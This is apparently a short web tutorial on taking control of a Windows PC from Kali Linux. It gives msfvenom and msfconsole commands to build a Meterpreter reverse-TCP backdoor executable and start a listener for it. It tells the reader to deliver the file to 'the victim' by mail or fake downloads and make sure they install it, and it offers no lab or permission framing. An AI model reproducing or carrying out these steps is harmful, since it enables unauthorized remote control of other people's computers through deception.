Hack Windows PC Using Kali Linux

by Neonate in Circuits > Linux

89320 Views, 28 Favorites, 0 Comments

Hack Windows PC Using Kali Linux

hackwindows.jpg

Today lets see how to hack Windows PC using Kali Linux

Creating the Payload

Screen Shot 2016-11-25 at 12.35.36 PM.png

To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.

Open terminal and Type

msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe

Starting the Metasploit Framework Console

Screen Shot 2016-11-25 at 12.35.53 PM.png

For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.

The Metasploit Framework Console has many payloads and many exploit method.

To start the Metasploit Framework Console. In the terminal type

msfconsole


Choosing the Exploit Method

Screen Shot 2016-11-25 at 12.36.08 PM.png

As I have said the Metasploit Framework Console has many exploitation method.

In this we will use the multi handler.

Type

use exploit/multi/handler


Setting the Payload

Screen Shot 2016-11-25 at 12.36.22 PM.png

In above step we set our exploitation method. In this step we need to specify the payload that we have created.

Type

set payload windows/meterpreter/reverse_tcp


Providing Ip for Backdooring

Screen Shot 2016-11-25 at 12.37.10 PM.png

In this step we need to provide the ip address of our machine so that the payload will connect to our system.

To find the ip address, open terminal and type ifconfig, and copy your ip address.

Then we have to set it in the msfconsole, so type

set LHOST (your ip address)

Sending the File and Exploiting

Screen Shot 2016-11-25 at 12.37.23 PM.png

After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.

After doing it, in the msfconsole command, type

exploit

After this command it will show you the victim terminal and you can control it.

Watch the Video

Hack Windows PC using Kali Linux

You can watch the video for clarification